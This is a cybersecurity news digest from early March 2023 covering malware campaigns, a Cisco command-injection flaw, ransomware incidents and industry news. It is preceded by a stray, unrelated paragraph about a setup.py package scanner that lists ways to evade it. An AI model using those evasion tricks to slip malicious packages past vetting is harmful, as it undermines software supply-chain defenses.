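A scanner like this belongs in the pipeline that vets third-party packages before they reach a build, run on the sdist rather than the wheel, since only the sdist carries `setup.py`. It is a triage aid: string concatenation, `getattr` tricks or a payload split across helper modules evade it, so a hit means "read this by hand", and a clean result is not a clearance.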
March 2, 2023 – Attack
Threat actors target law firms with GootLoader and SocGholish malware Full Text
Abstract
Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms...Security Affairs
March 2, 2023 – Phishing
Cambodia-Based “Sour Grapes” Pig Butchering Scam Targets Southeast Asia Full Text
Abstract
The teams running these scams include a young man or woman acting as the face of the scam, keyboarders who keep the victim engaged, and a team generating and repurposing media content with fabricated proof of their backstory.Cyware
March 02, 2023 – Malware
SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics Full Text
Abstract
The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said it observed the equivalent Windows variant in June 2022, nearly one month after the command-and-control (C2) infrastructure was set up. Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate , HyperBro, PlugX, and a Linux backdoor dubbed rshell. Over the past two years, campaigns orchestrated by the threat group have embraced supply chain compromises of legitimate apps like Able Desktop and MiMi Chat to obtain remote access to compromised systems. In October 2022, IntrinThe Hacker News
March 2, 2023 – Malware
R3NIN Sniffer Malware Stealing Credit Card Data From E-Commerce Consumers
Abstract
In the event of a website being hacked, attackers may implant an encoded malicious script into the web server, designed to activate when a target user accesses the corrupted web page. – Cyware
March 02, 2023 – Vulnerabilities
Critical Flaw in Cisco IP Phone Series Exposes Users to Command Injection Attack
Abstract
Cisco on Wednesday rolled out security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. The vulnerability, tracked as CVE-2023-20078, is rated 9.8 out of 10 on the CVSS scoring system and is described as a command injection bug in the web-based management interface arising due to insufficient validation of user-supplied input. Successful exploitation of the bug could allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with the highest privileges on the underlying operating system. "An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface," Cisco said in an alert published on March 1, 2023. Also patched by the company is a high-severity denial-of-service (DoS) vulnerability affecting the same set of devices, as well as the Cisco Unified IP Conference Phone 8831 and Unified IP Phone 7900 Series. CVE-2023-20079 (CVSS score: 7... – The Hacker News
March 2, 2023 – Business
Cisco to Acquire Valtix for Cloud Network Security Tech
Abstract
Cisco is dipping into the acquisition pool to beef up its cybersecurity portfolio with plans to acquire Valtix, an early-stage Silicon Valley startup in the cloud network security business. – Cyware
March 1, 2023 – General
Covert cyberattacks on the rise as attackers shift tactics for maximum impact
Abstract
2022 was the second-highest year on record for global ransomware attempts and also saw an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall. – Cyware
March 01, 2023 – Criminals
Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware
Abstract
Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing GootLoader and FakeUpdates (aka SocGholish) malware strains. GootLoader, active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware. It notably employs search engine optimization (SEO) poisoning to funnel victims searching for business-related documents toward drive-by download sites that drop the JavaScript malware. In the campaign detailed by cybersecurity company eSentire, the threat actors are said to have compromised legitimate, but vulnerable, WordPress websites and added new blog posts without the owners' knowledge. "When the computer user navigates to one of these malicious web pages and hits the link to download the purported business agreement, they are unknowingly downloading GootLoader," eSentire researcher Keegan Keplinger said... – The Hacker News
March 1, 2023 – Government
Canada is going to ban TikTok on government mobile devices
Abstract
The Canadian government announced it will ban the video app TikTok from all government-issued devices over security concerns. Canada is going to ban the popular Chinese video-sharing app TikTok from the mobile devices of its employees over security... – Security Affairs
March 1, 2023 – Vulnerabilities
Critical Vulnerabilities Patched in ThingWorx, Kepware IIoT Products
Abstract
Several industrial IoT (IIoT) software products made by PTC are affected by two critical vulnerabilities that can be exploited for denial-of-service (DoS) attacks and remote code execution. – Cyware
March 01, 2023 – Malware
BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11
Abstract
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape. "This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled," Slovak cybersecurity company ESET said in a report shared with The Hacker News. UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges. Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine. Details about BlackLotus f... – The Hacker News
March 1, 2023 – Malware
BlackLotus is the first bootkit bypassing UEFI Secure Boot on Windows 11
Abstract
ESET discovered a stealthy Unified Extensible Firmware Interface (UEFI) bootkit dubbed BlackLotus that is able to bypass Secure Boot on Windows 11. Researchers from ESET discovered a new stealthy Unified Extensible Firmware Interface (UEFI) bootkit,... – Security Affairs
March 1, 2023 – Business
Immuta Receives Strategic Investment from ServiceNow
Abstract
Immuta, a Boston, MA-based data security company, received an additional strategic investment from ServiceNow. The investment, which was in addition to the Series E funding round, will allow the company to continue growing its cloud offering. – Cyware
March 01, 2023 – General
CISOs Are Stressed Out and It’s Putting Companies at Risk
Abstract
Employee well-being has become a primary focus for many businesses. Even before the pandemic, the C-suite was acutely aware of how employee mental health impacts business outcomes. But for cybersecurity professionals, stress has always been a part of the job. A new survey revealed that one of the most concerning aspects of employee mental health is how it impacts cybersecurity programs and, more broadly, a business' ability to protect itself from cyberattacks. CISOs and their teams appear to be taking the brunt of unmitigated work-related stress levels and it's affecting the entire organization. CISOs at small to midsize businesses with teams of five employees or fewer were surveyed to better understand how work-related stress is impacting CISOs – from their ability to do their job and lead their team to how it's affecting their own professional outlook and personal life. Here's what the survey results revealed. The Impact of CISO Work-Stress Levels on Small... – The Hacker News
March 1, 2023 – Outage
Satellite TV giant Dish admitted that the recent outage was caused by a ransomware attack
Abstract
Satellite TV giant Dish Network has confirmed that the recent outage was caused by a ransomware attack; it also disclosed a data breach. Satellite TV giant Dish Network finally admitted that the recent outage was caused by a ransomware attack. The... – Security Affairs
March 1, 2023 – Malware
Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting
Abstract
In 2022, Trend Micro researchers noticed that they updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform. – Cyware
March 01, 2023 – Solution
Gmail and Google Calendar Now Support Client-Side Encryption (CSE) to Boost Data Privacy
Abstract
Google has announced the general availability of client-side encryption (CSE) for Gmail and Calendar, months after piloting the feature in late 2022. The data privacy controls enable "even more organizations to become arbiters of their own data and the sole party deciding who has access to it," Google's Ganesh Chilakapati and Andy Wen said. To that end, users can send and receive emails or create meeting events within their organizations or to other external parties in a manner that's encrypted "before it reaches Google servers." The company is also making available a decrypter tool in beta for Windows to decrypt client-side encrypted files and emails exported via its Data Export tool or Google Vault. macOS and Linux versions of the decrypter are expected to be released in the future. The development follows the rollout of CSE to other products such as Google Drive, Docs, Slides, Sheets, and Meet. The solution, the tech behemoth said, is aimed... – The Hacker News
March 1, 2023 – Cryptocurrency
Parallax RAT used in attacks aimed at cryptocurrency entities
Abstract
Experts warn of a new wave of attacks against cryptocurrency entities in which threat actors are using a RAT dubbed Parallax RAT for infiltration. Researchers from cybersecurity firm Uptycs warn of attacks targeting cryptocurrency organizations with the Parallax... – Security Affairs
March 1, 2023 – General
Can You See It Now? An Emerging LockBit Campaign
Abstract
Researchers from FortiGuard Labs observed a new LockBit ransomware campaign during December 2022 and January 2023 using a combination of techniques effective against AV and EDR solutions. – Cyware
March 01, 2023 – Malware
Parallax RAT Targeting Cryptocurrency Firms with Sophisticated Injection Techniques
Abstract
Cryptocurrency companies are being targeted as part of a new campaign that delivers a remote access trojan called Parallax RAT. The malware "uses injection techniques to hide within legitimate processes, making it difficult to detect," Uptycs said in a new report. "Once it has been successfully injected, attackers can interact with their victim via Windows Notepad that likely serves as a communication channel." Parallax RAT grants attackers remote access to victim machines. It comes with features to upload and download files as well as record keystrokes and screen captures. It has been put to use since early 2020 and was previously delivered via COVID-19-themed lures. In February 2022, Proofpoint detailed an activity cluster dubbed TA2541 targeting aviation, aerospace, transportation, manufacturing, and defense industries using different RATs, including Parallax. The first payload is a Visual C++ malware that employs the process hollowing technique to... – The Hacker News
March 1, 2023 – Solution
Google Gmail client-side encryption is available globally
Abstract
Gmail client-side encryption (CSE) is now available for Workspace Enterprise Plus, Education Plus, and Education Standard customers. Google announced that Gmail client-side encryption (CSE) is now available for all Google Workspace Enterprise Plus,... – Security Affairs
March 1, 2023 – Breach
Video Marketing Software Animaker Leaking Trove of User Data
Abstract
A misconfigured database has exposed test and personal data belonging to over 700,000 users of the websites getshow.io (an all-in-one video marketing platform) and animaker.com (a DIY video animation software). – Cyware
March 1, 2023 – Ransomware
Universal Decryptor for MortalKombat Ransomware Released
Abstract
A new decryptor for the MortalKombat ransomware is now available for download. Bitdefender has been monitoring the MortalKombat ransomware family since it first appeared online in January this year. – Cyware
March 1, 2023 – General
Scams are Rising and Rising Fast - Shows FTC 2022 Data
Abstract
According to new data from the FTC, U.S. consumers lost $8.8 billion to online fraud in 2022, with investment scams and imposter scams topping the list, causing $3.8 billion and $2.6 billion in losses, respectively. Among the top five fraud schemes, imposter scams topped the list, followed by onlin... – Cyware